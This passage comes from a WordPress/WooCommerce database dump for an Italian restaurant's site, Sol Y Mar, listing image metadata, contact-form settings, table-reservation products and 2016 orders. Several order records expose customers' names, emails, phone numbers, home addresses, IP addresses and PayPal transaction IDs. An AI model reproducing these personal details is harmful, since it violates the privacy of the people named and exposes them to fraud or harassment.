spiaggia'),(542,197,'_wp_attached_file','2016/04/IMG_1441-1920x600.jpg'),(543,197,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2016/04/IMG_1441-1920x600.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"IMG_1441-1920x600-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-600x188.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"IMG_1441-1920x600-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"IMG_1441-1920x600-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-830x259.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:28:\"IMG_1441-1920x600-230x72.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:72;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:29:\"IMG_1441-1920x600-350x109.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(544,197,'_wp_attachment_image_alt','vista mare'),(545,197,'_wp_attachment_custom_header_last_used_sydney','1461164875'),(546,197,'_wp_attachment_is_custom_header','sydney'),(547,198,'_wp_attached_file','2016/04/sol-y-mar-logo-150.png'),(548,198,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:237;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2016/04/sol-y-mar-logo-150.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-230x146.png\";s:5:\"width\";i:230;s:6:\"height\";i:146;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(549,198,'_wp_attachment_image_alt','sol y mar'),(550,199,'_wp_attached_file','2016/04/serata-1920x1275.jpg'),(551,199,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1275;s:4:\"file\";s:28:\"2016/04/serata-1920x1275.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"serata-1920x1275-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-600x398.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"serata-1920x1275-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-830x551.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:551;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:28:\"serata-1920x1275-350x232.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(552,199,'_wp_attachment_image_alt','serata mare'),(553,203,'_form','<p>Il tuo nome (richiesto)<br />\n    [text* your-name] </p>\n\n<p>La tua email (richiesto)<br />\n    [email* your-email] </p>\n\n<p>Il tuo telefono (richiesto)<br />\n    [tel* tel-955] </p>\n\n<p>Oggetto<br />\n    [text your-subject] </p>\n\n<p>Il tuo messaggio<br />\n    [textarea your-message] </p>\n\n<p>Quiz antispam<br />\n\n[recaptcha]</p>\n\n<p>Accettazione Privacy\n [acceptance accettazione-privacy]</p>\n\n<p>[submit \"Invia\"]</p>'),(554,203,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:35:\"Da sito Sol Y Mar: \"[your-subject]\"\";s:6:\"sender\";s:44:\"[your-name] <notifiche@ristorantesolymar.it>\";s:9:\"recipient\";s:19:\"teosphone@gmail.com\";s:4:\"body\";s:243:\"Da: [your-name] <[your-email]>\nTelefono: [tel-955]\nOggetto: [your-subject]\n\nCorpo del messaggio:\n[your-message]\n\n[accettazione-privacy]\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(555,203,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:26:\"Sol Y Mar \"[your-subject]\"\";s:6:\"sender\";s:46:\"Sol Y Mar <wordpress@www.ristorantesolymar.it>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:142:\"Corpo del messaggio:\n[your-message]\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (http://www.ristorantesolymar.it)\";s:18:\"additional_headers\";s:35:\"Reply-To: webmaster@baldisserri.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(556,203,'_messages','a:23:{s:12:\"mail_sent_ok\";s:46:\"Grazie per il tuo messaggio. È stato inviato.\";s:12:\"mail_sent_ng\";s:88:\"Si è verificato un errore durante l\'invio del tuo messaggio. Per favore prova di nuovo.\";s:16:\"validation_error\";s:69:\"Uno o più campi hanno errori. Per favore controlla e prova di nuovo.\";s:4:\"spam\";s:88:\"Si è verificato un errore durante l\'invio del tuo messaggio. Per favore prova di nuovo.\";s:12:\"accept_terms\";s:70:\"Devi accettare termini e condizioni prima di inviare il tuo messaggio.\";s:16:\"invalid_required\";s:22:\"Il campo è richiesto.\";s:16:\"invalid_too_long\";s:25:\"Il campo è troppo lungo.\";s:17:\"invalid_too_short\";s:25:\"Il campo è troppo corto.\";s:12:\"invalid_date\";s:38:\"Il formato della data non è corretto.\";s:14:\"date_too_early\";s:50:\"La data è antecedente alla prima data consentita.\";s:13:\"date_too_late\";s:49:\"La data è successiva all\'ultima data consentita.\";s:13:\"upload_failed\";s:71:\"Si è verificato un errore sconosciuto durante il caricamento del file.\";s:24:\"upload_file_type_invalid\";s:56:\"Non sei abilitato al caricamenti di file di questo tipo.\";s:21:\"upload_file_too_large\";s:25:\"Il file è troppo grande.\";s:23:\"upload_failed_php_error\";s:48:\"Si è verificato un errore nel caricare il file.\";s:14:\"invalid_number\";s:34:\"Il formato numerico non è valido.\";s:16:\"number_too_small\";s:44:\"Il numero è inferiore al minimo consentito.\";s:16:\"number_too_large\";s:45:\"Il numero è superiore al massimo consentito.\";s:23:\"quiz_answer_not_correct\";s:36:\"La risposta al quiz non è corretta.\";s:17:\"captcha_not_match\";s:41:\"Il codice che hai inserito non è valido.\";s:13:\"invalid_email\";s:42:\"L\'indirizzo e-mail inserito non è valido.\";s:11:\"invalid_url\";s:20:\"L\'URL non è valido.\";s:11:\"invalid_tel\";s:36:\"Il numero di telefono non è valido.\";}'),(557,203,'_additional_settings',''),(558,203,'_locale','it_IT'),(37656,3698,'to_header','webmaster@baldisserri.com'),(37654,3698,'success',''),(37655,3698,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(561,211,'_edit_lock','1517071661:1'),(562,211,'_edit_last','1'),(563,212,'_wp_attached_file','2016/11/tavolo-riservato.png'),(564,212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:158;s:4:\"file\";s:28:\"2016/11/tavolo-riservato.png\";s:5:\"sizes\";a:5:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"tavolo-riservato-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"tavolo-riservato-200x158.png\";s:5:\"width\";i:200;s:6:\"height\";i:158;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"tavolo-riservato-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"tavolo-riservato-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:28:\"tavolo-riservato-230x155.png\";s:5:\"width\";i:230;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(565,211,'_visibility','visible'),(566,211,'_thumbnail_id','212'),(567,211,'total_sales','26'),(568,211,'_downloadable','no'),(569,211,'_virtual','no'),(570,211,'_purchase_note',''),(571,211,'_featured','no'),(572,211,'_weight',''),(573,211,'_length',''),(574,211,'_width',''),(575,211,'_height',''),(576,211,'_sku','tavolox2'),(577,211,'_product_attributes','a:0:{}'),(578,211,'_regular_price','60'),(579,211,'_sale_price',''),(580,211,'_sale_price_dates_from',''),(581,211,'_sale_price_dates_to',''),(582,211,'_sold_individually','yes'),(583,211,'_manage_stock','yes'),(584,211,'_backorders','no'),(585,211,'_stock','1'),(586,211,'_stock_status','outofstock'),(587,211,'_upsell_ids','a:0:{}'),(588,211,'_crosssell_ids','a:0:{}'),(589,211,'_price','60'),(590,211,'_product_version','3.3.3'),(591,211,'_product_image_gallery',''),(592,211,'slide_template',''),(593,211,'_yoast_wpseo_primary_product_cat','7'),(594,211,'_yoast_wpseo_content_score','30'),(595,211,'_wc_rating_count','a:0:{}'),(596,211,'_wc_review_count','0'),(597,211,'_wc_average_rating','0'),(598,213,'_edit_lock','1514308394:2'),(599,213,'_edit_last','2'),(600,213,'_visibility','visible'),(601,213,'_thumbnail_id','212'),(602,213,'_downloadable','no'),(603,213,'_virtual','no'),(604,213,'_purchase_note',''),(605,213,'_featured','no'),(606,213,'_weight',''),(607,213,'_length',''),(608,213,'_width',''),(609,213,'_height',''),(610,213,'_product_attributes','a:1:{s:17:\"pa_numero-coperti\";a:6:{s:4:\"name\";s:17:\"pa_numero-coperti\";s:5:\"value\";s:0:\"\";s:8:\"position\";i:0;s:10:\"is_visible\";i:1;s:12:\"is_variation\";i:1;s:11:\"is_taxonomy\";i:1;}}'),(611,213,'_regular_price','90'),(612,213,'_sale_price',''),(613,213,'_sale_price_dates_from',''),(614,213,'_sale_price_dates_to',''),(615,213,'_sold_individually','yes'),(616,213,'_manage_stock','yes'),(617,213,'_backorders','no'),(618,213,'_stock','0'),(619,213,'_stock_status','outofstock'),(620,213,'_upsell_ids','a:0:{}'),(621,213,'_crosssell_ids','a:0:{}'),(623,213,'_product_version','3.3.3'),(624,213,'_product_image_gallery',''),(625,213,'slide_template',''),(626,213,'_yoast_wpseo_primary_product_cat','7'),(627,213,'_yoast_wpseo_content_score','30'),(628,213,'total_sales','3'),(629,213,'_sku','tavolox3'),(630,213,'_wc_rating_count','a:0:{}'),(631,213,'_wc_review_count','0'),(632,213,'_wc_average_rating','0'),(635,216,'_edit_lock','1514315746:2'),(636,216,'_edit_last','2'),(637,216,'_visibility','visible'),(638,216,'_thumbnail_id','212'),(639,216,'_downloadable','no'),(640,216,'_virtual','no'),(641,216,'_purchase_note',''),(642,216,'_featured','no'),(643,216,'_weight',''),(644,216,'_length',''),(645,216,'_width',''),(646,216,'_height',''),(647,216,'_product_attributes','a:0:{}'),(648,216,'_regular_price','120'),(649,216,'_sale_price',''),(650,216,'_sale_price_dates_from',''),(651,216,'_sale_price_dates_to',''),(652,216,'_sold_individually','yes'),(653,216,'_manage_stock','yes'),(654,216,'_backorders','no'),(655,216,'_stock','0'),(656,216,'_stock_status','outofstock'),(657,216,'_upsell_ids','a:0:{}'),(658,216,'_crosssell_ids','a:0:{}'),(659,216,'_price','120'),(660,216,'_product_version','3.3.3'),(661,216,'_product_image_gallery',''),(662,216,'slide_template',''),(663,216,'_yoast_wpseo_primary_product_cat','7'),(664,216,'_yoast_wpseo_content_score','30'),(665,216,'total_sales','12'),(666,216,'_sku','tavolox4'),(667,216,'_wc_rating_count','a:0:{}'),(668,216,'_wc_review_count','0'),(669,216,'_wc_average_rating','0'),(787,220,'_edit_last','2'),(788,220,'_visibility','visible'),(789,220,'_edit_lock','1514543070:2'),(790,220,'_thumbnail_id','212'),(791,220,'_downloadable','no'),(792,220,'_virtual','no'),(793,220,'_purchase_note',''),(794,220,'_featured','no'),(795,220,'_weight',''),(796,220,'_length',''),(797,220,'_width',''),(798,220,'_height',''),(799,220,'_product_attributes','a:1:{s:14:\"numero-persone\";a:6:{s:4:\"name\";s:14:\"Numero Persone\";s:5:\"value\";s:5:\"2 | 3\";s:8:\"position\";s:1:\"0\";s:10:\"is_visible\";i:1;s:12:\"is_variation\";i:1;s:11:\"is_taxonomy\";i:0;}}'),(800,220,'_regular_price','180'),(801,220,'_sale_price',''),(802,220,'_sale_price_dates_from',''),(803,220,'_sale_price_dates_to',''),(804,220,'_sold_individually','yes'),(805,220,'_manage_stock','yes'),(806,220,'_backorders','no'),(807,220,'_stock','0'),(808,220,'_stock_status','outofstock'),(809,220,'_upsell_ids','a:0:{}'),(810,220,'_crosssell_ids','a:0:{}'),(811,220,'_price','180'),(812,220,'_product_version','3.3.3'),(813,220,'_product_image_gallery',''),(814,220,'slide_template',''),(815,220,'_yoast_wpseo_primary_product_cat','7'),(816,220,'_yoast_wpseo_content_score','60'),(817,220,'total_sales','7'),(818,220,'_sku','tavolox6'),(832,220,'_wc_rating_count','a:0:{}'),(833,220,'_wc_average_rating','0'),(848,213,'_min_variation_price','60'),(849,213,'_max_variation_price','90'),(850,213,'_min_price_variation_id','223'),(851,213,'_max_price_variation_id','222'),(852,213,'_min_variation_regular_price','60'),(853,213,'_max_variation_regular_price','90'),(854,213,'_min_regular_price_variation_id','223'),(855,213,'_max_regular_price_variation_id','222'),(856,213,'_min_variation_sale_price',NULL),(857,213,'_max_variation_sale_price',NULL),(858,213,'_min_sale_price_variation_id',NULL),(859,213,'_max_sale_price_variation_id',NULL),(877,213,'_default_attributes','a:0:{}'),(899,213,'_wp_old_slug','tavolo-3-persone'),(926,213,'_price','90'),(927,213,'_price','90'),(928,141,'_yoast_wpseo_content_score','30'),(929,225,'_edit_lock','1512197365:1'),(930,225,'_edit_last','1'),(933,225,'slide_template','default'),(934,225,'_yoast_wpseo_content_score','60'),(935,225,'_yoast_wpseo_primary_category','1'),(940,220,'_wc_review_count','0'),(941,229,'_order_key','wc_order_583d410413b9f'),(942,229,'_order_currency','EUR'),(943,229,'_prices_include_tax','no'),(944,229,'_customer_ip_address','94.138.177.105'),(945,229,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),(946,229,'_customer_user','0'),(947,229,'_created_via','checkout'),(948,229,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(949,229,'_order_version','2.6.8'),(950,229,'_billing_first_name','Carlo'),(951,229,'_billing_last_name','Varini'),(952,229,'_billing_email','rseuropa@hotmail.it'),(953,229,'_billing_phone','3483652330'),(954,229,'_billing_address_1',''),(955,229,'_billing_city',''),(956,229,'_shipping_first_name','Carlo'),(957,229,'_shipping_last_name','Varini'),(958,229,'_shipping_company',''),(959,229,'_shipping_country',''),(960,229,'_shipping_address_1',''),(961,229,'_shipping_address_2',''),(962,229,'_shipping_city',''),(963,229,'_shipping_state',''),(964,229,'_shipping_postcode',''),(965,229,'_payment_method','paypal'),(966,229,'_payment_method_title','PayPal'),(967,229,'_order_shipping',''),(968,229,'_cart_discount','0'),(969,229,'_cart_discount_tax','0'),(970,229,'_order_tax','0'),(971,229,'_order_shipping_tax','0'),(972,229,'_order_total','60.00'),(973,229,'Numero Persone Adulte','2'),(974,229,'Numero bambini fino a 6 anni',''),(975,229,'Numero ragazzi fino a 13 anni',''),(976,229,'Files attached','[]'),(977,229,'Payer PayPal address','rseuropa@hotmail.it'),(978,229,'Payer first name','Carlo'),(979,229,'Payer last name','Varini'),(980,229,'Payment type','instant'),(981,229,'_download_permissions_granted','1'),(982,229,'_recorded_sales','yes'),(983,229,'_paid_date','2016-11-29 09:51:20'),(984,229,'_transaction_id','36H90945ME822025D'),(985,229,'_order_stock_reduced','1'),(986,229,'PayPal Transaction Fee','2.39'),(987,230,'_order_key','wc_order_583e82077a6df'),(988,230,'_order_currency','EUR'),(989,230,'_prices_include_tax','no'),(990,230,'_customer_ip_address','151.82.80.248'),(991,230,'_customer_user_agent','Mozilla/5.0 (Linux; Android 4.4.4; GT-I9060I Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36'),(992,230,'_customer_user','3'),(993,230,'_created_via','checkout'),(994,230,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(995,230,'_order_version','2.6.8'),(996,230,'_billing_first_name','CALZOLARI Gionata'),(997,230,'_billing_last_name','Calzolari'),(998,230,'_billing_email','gionata.calzolari2012@gmail.com'),(999,230,'_billing_phone','3335731283'),(1000,230,'_billing_address_1','Via Roma 42'),(1001,230,'_billing_city','ROLO (re)'),(1002,230,'_shipping_first_name','CALZOLARI Gionata'),(1003,230,'_shipping_last_name','Calzolari'),(1004,230,'_shipping_company',''),(1005,230,'_shipping_country',''),(1006,230,'_shipping_address_1','Via Roma 42'),(1007,230,'_shipping_address_2',''),(1008,230,'_shipping_city','ROLO (re)'),(1009,230,'_shipping_state',''),(1010,230,'_shipping_postcode',''),(1011,230,'_payment_method','paypal'),(1012,230,'_payment_method_title','PayPal'),(1013,230,'_order_shipping',''),(1014,230,'_cart_discount','0'),(1015,230,'_cart_discount_tax','0'),(1016,230,'_order_tax','0'),(1017,230,'_order_shipping_tax','0'),(1018,230,'_order_total','60.00'),(1019,230,'Numero Persone Adulte','2'),(1020,230,'Numero bambini fino a 6 anni',''),(1021,230,'Numero ragazzi fino a 13 anni',''),(1022,230,'Files attached','[]'),(1023,230,'Payer PayPal address','gionata.calzolari@alice.it'),(1024,230,'Payer first name','Gionata'),(1025,230,'Payer last name','Calzolari'),(1026,230,'Payment type','instant'),(1027,230,'_download_permissions_granted','1'),(1028,230,'_recorded_sales','yes'),(1029,230,'_paid_date','2016-11-30 08:40:35'),(1030,230,'_transaction_id','03134922PX683400F'),(1031,230,'_order_stock_reduced','1'),(1032,230,'PayPal Transaction Fee','2.39'),(1033,231,'_order_key','wc_order_583eab4833625'),(1034,231,'_order_currency','EUR'),(1035,231,'_prices_include_tax','no'),(1036,231,'_customer_ip_address','87.2.103.150'),(1037,231,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(1038,231,'_customer_user','0'),(1039,231,'_created_via','checkout'),(1040,231,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1041,231,'_order_version','2.6.8'),(1042,231,'_billing_first_name','franco'),(1043,231,'_billing_last_name','moretti'),(1044,231,'_billing_email','moretti.franco1@virgilio.it'),(1045,231,'_billing_phone','0376245019'),(1046,231,'_billing_address_1','via volturno8'),(1047,231,'_billing_city','san giorgio di mantova'),(1048,231,'_shipping_first_name','franco'),(1049,231,'_shipping_last_name','moretti'),(1050,231,'_shipping_company',''),(1051,231,'_shipping_country',''),(1052,231,'_shipping_address_1','via volturno8'),(1053,231,'_shipping_address_2',''),(1054,231,'_shipping_city','san giorgio di mantova'),(1055,231,'_shipping_state',''),(1056,231,'_shipping_postcode',''),(1057,231,'_payment_method','paypal'),(1058,231,'_payment_method_title','PayPal'),(1059,231,'_order_shipping',''),(1060,231,'_cart_discount','0'),(1061,231,'_cart_discount_tax','0'),(1062,231,'_order_tax','0'),(1063,231,'_order_shipping_tax','0'),(1064,231,'_order_total','60.00'),(1065,231,'Numero Persone Adulte','2'),(1066,231,'Numero bambini fino a 6 anni',''),(1067,231,'Numero ragazzi fino a 13 anni',''),(1068,231,'Files attached','[]'),(1069,232,'_order_key','wc_order_583ec62e26db2'),(1070,232,'_order_currency','EUR'),(1071,232,'_prices_include_tax','no'),(1072,232,'_customer_ip_address','87.2.103.150'),(1073,232,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(1074,232,'_customer_user','0'),(1075,232,'_created_via','checkout'),(1076,232,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1077,232,'_order_version','2.6.8'),(1078,232,'_billing_first_name','Franco'),(1079,232,'_billing_last_name','Moretti'),(1080,232,'_billing_email','morettigregorio@virgilio.it'),(1081,232,'_billing_phone','3487050954'),(1082,232,'_billing_address_1','via volturno 8'),(1083,232,'_billing_city','San Giorgio di Mantova'),(1084,232,'_shipping_first_name','Franco'),(1085,232,'_shipping_last_name','Moretti'),(1086,232,'_shipping_company',''),(1087,232,'_shipping_country',''),(1088,232,'_shipping_address_1','via volturno 8'),(1089,232,'_shipping_address_2',''),(1090,232,'_shipping_city','San Giorgio di Mantova'),(1091,232,'_shipping_state',''),(1092,232,'_shipping_postcode',''),(1093,232,'_payment_method','paypal'),(1094,232,'_payment_method_title','PayPal'),(1095,232,'_order_shipping',''),(1096,232,'_cart_discount','0'),(1097,232,'_cart_discount_tax','0'),(1098,232,'_order_tax','0'),(1099,232,'_order_shipping_tax','0'),(1100,232,'_order_total','60.00'),(1101,232,'Numero Persone Adulte','2'),(1102,232,'Numero bambini fino a 6 anni',''),(1103,232,'Numero ragazzi fino a 13 anni',''),(1104,232,'Files attached','[]'),(1105,232,'Payer PayPal address','moretti.franco1@virgilio.it'),(1106,232,'Payer first name','Franco'),(1107,232,'Payer last name','Moretti'),(1108,232,'Payment type','instant'),(1109,232,'_download_permissions_granted','1'),(1110,232,'_recorded_sales','yes'),(1111,232,'_paid_date','2016-11-30 13:33:31'),(1112,232,'_transaction_id','2EC80463VR520505C'),(1113,232,'_order_stock_reduced','1'),(1114,232,'PayPal Transaction Fee','2.39'),(1119,233,'_order_key','wc_order_5842ab8617c6e'),(1120,233,'_order_currency','EUR'),(1121,233,'_prices_include_tax','no'),(1122,233,'_customer_ip_address','87.30.138.14'),(1123,233,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36'),(1124,233,'_customer_user','0'),(1125,233,'_created_via','checkout'),(1126,233,'_cart_hash','c0bda69ce83c24155f1ed69159f2a720'),(1127,233,'_order_version','2.6.8'),(1128,233,'_billing_first_name','Roberto'),(1129,233,'_billing_last_name','Rimondi'),(1130,233,'_billing_email','robertorimondi@yahoo.it'),(1131,233,'_billing_phone','3381312819'),(1132,233,'_billing_address_1',''),(1133,233,'_billing_city',''),(1134,233,'_shipping_first_name','Roberto'),(1135,233,'_shipping_last_name','Rimondi'),(1136,233,'_shipping_company',''),(1137,233,'_shipping_country',''),(1138,233,'_shipping_address_1',''),(1139,233,'_shipping_address_2',''),(1140,233,'_shipping_city',''),(1141,233,'_shipping_state',''),(1142,233,'_shipping_postcode',''),(1143,233,'_payment_method','paypal'),(1144,233,'_payment_method_title','PayPal'),(1145,233,'_order_shipping',''),(1146,233,'_cart_discount','0'),(1147,233,'_cart_discount_tax','0'),(1148,233,'_order_tax','0'),(1149,233,'_order_shipping_tax','0'),(1150,233,'_order_total','180.00'),(1151,233,'Numero Persone Adulte','6'),(1152,233,'Numero bambini fino a 6 anni',''),(1153,233,'Numero ragazzi fino a 13 anni',''),(1154,233,'Files attached','[]'),(1155,233,'Payer PayPal address','robby9191@hotmail.it'),(1156,233,'Payer first name','Roberto'),(1157,233,'Payer last name','Rimondi'),(1158,233,'Payment type','instant'),(1159,233,'_download_permissions_granted','1'),(1160,233,'_recorded_sales','yes'),(1161,233,'_paid_date','2016-12-03 12:26:58'),(1162,233,'_transaction_id','0PG56025VW131991L'),(1163,233,'_order_stock_reduced','1'),(1164,233,'PayPal Transaction 